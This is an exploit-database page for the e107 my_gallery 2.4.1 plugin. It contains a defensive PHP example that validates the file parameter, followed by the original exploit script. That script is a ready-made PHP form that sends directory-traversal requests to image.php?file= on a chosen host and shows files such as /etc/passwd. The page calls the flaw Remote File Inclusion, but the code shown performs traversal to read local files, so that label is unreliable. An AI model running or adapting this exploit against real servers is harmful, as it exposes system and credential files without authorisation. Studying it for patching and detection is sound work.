vendor: my_gallery
by: NoGe & Vrs-hCk
CVSS: 9.3 (HIGH)
Type: Remote File Inclusion
CWE: 98
Product Name: my_gallery
Affected Version From: 2.4.1
Affected Version To: 2.4.1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2009

e107 Plugin my_gallery 2.4.1 Exploit

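e107 Plugin my_gallery 2.4.1 is affected by a Remote File Inclusion vulnerability. It allows an attacker to make the server include a remote file, usually through a malicious URL, and execute it on the vulnerable server. This can give the attacker access to sensitive information, such as passwords, or even full control of the server. The proof of concept below targets the file parameter of /e107_plugins/my_gallery/image.php and prefixes the requested path with a long run of /.. segments; its usage example reads /etc/passwd.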

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is properly sanitized and validated. This can be done by using a whitelist of accepted inputs, or by using a blacklist of known malicious inputs.
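
One way to apply the allow-list approach to a file parameter like the one in image.php?file=, shown as an added example that is not the plugin's code or a vendor patch. The names resolve_gallery_file() and ALLOWED_EXT and the temporary demo directory are hypothetical, and the sample inputs are constructed.

```php
<?php
// Added example: hypothetical hardened lookup for a "file" request parameter.
// resolve_gallery_file() and ALLOWED_EXT are assumed names, not the plugin's code.

const ALLOWED_EXT = ['jpg', 'jpeg', 'png', 'gif'];

/**
 * Return the canonical path of $requested if it is an image inside $baseDir,
 * or null if the request must be refused.
 */
function resolve_gallery_file(string $baseDir, string $requested): ?string
{
    // Refuse empty values and embedded NUL bytes outright.
    if ($requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() collapses "../" and follows symlinks; it returns false for
    // anything that is not an existing local path, which includes URLs.
    $real = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($real === false || !is_file($real)) {
        return null;
    }
    // The canonical path must still sit under the gallery directory.
    if (strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    // Allow-list by extension: only image types are ever served.
    $ext = strtolower(pathinfo($real, PATHINFO_EXTENSION));
    return in_array($ext, ALLOWED_EXT, true) ? $real : null;
}

// Constructed demo: a temporary gallery directory holding one image.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'gallery_demo_' . getmypid();
@mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'cat.jpg', 'demo');

// The second input is the traversal prefix and target path shown on this page.
$trav = '/../../../../../../../../../../../../../../../etc/passwd';
foreach (['cat.jpg', $trav, 'http://example.invalid/x.txt', 'missing.png'] as $in) {
    $out = resolve_gallery_file($dir, $in);
    printf("%-28.28s => %s\n", $in, $out === null ? 'refused' : 'served');
}

unlink($dir . DIRECTORY_SEPARATOR . 'cat.jpg');
rmdir($dir);
```

The check is done on the canonical path after resolution, so encoded or nested traversal sequences that survive string filtering are still refused, and the validated path is the only value that should reach any file-reading or include call.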
Source

Exploit-DB raw data:

<?php

/*

============================================
[o] e107 Plugin my_gallery 2.4.1 Exploit [o]
============================================

Bug [f]ound by NoGe - noge.code@gmail.com
Exploit [c]oded by Vrs-hCk - d00r@telkom.net

* Plugin my_gallery create photo gallery.
* Powered by Highslide JS script.
* With random gallery menu and navigation menu.
* Has a comment system, ratings and search of images.

Download e107 my_gallery 2.4.1 Plugin
http://code.google.com/p/e107mygalleryplugin/downloads/list


=============
[o] Usage [o]
=============

Web 2 XPL << fill with site who use e107 Plugin my_gallery
File 2 Read << fill with file or directory you want to read

Web 2 XPL : www.contoh.com
File 2 Read : /etc/passwd

Then Go!!!


==============
[o] Greetz [o]
==============

MainHack BrotherHood [ http://news.serverisdown.org ]
Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 Angela Zhang
H312Y yooogy mousekill }^-^{ loqsa zxvf martfella
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke

FUCK TERORIS!!

*/

$vuln  = '/e107_plugins/my_gallery/image.php?file=';
$trasv = '/../../../../../../../../../../../../../../..';

echo "<form method=POST>
Web 2 XPL : <input type=\"text\" name=\"host\" size=30>
File 2 Read : <input type=\"text\" name=\"file\" size=30>
<input type=submit value=\"Go!!!\" name=\"_xpl\">
<br><br>";

if ($_POST['_xpl']) {
	$data .= "GET /{$vuln}{$trasv}{$file} HTTP/1.1\r\n";
	$data .= "Host: {$host}\r\n";
	$data .= "Connection: close\r\n\r\n";
	$html  = sendpacket($host,$data);
	print '<pre>'.htmlspecialchars($html).'</pre>';
}

echo "</form>";

function sendpacket($host,$data) {
	if (!$sock = @fsockopen($host,80)) {
		die("[!] Connection refused, try again!\n");
	}
	fputs($sock,$data);
	while (!feof($sock)) { $html .= fgets($sock); }
	fclose($sock);
	return $html;
}

?>

# milw0rm.com [2009-07-23]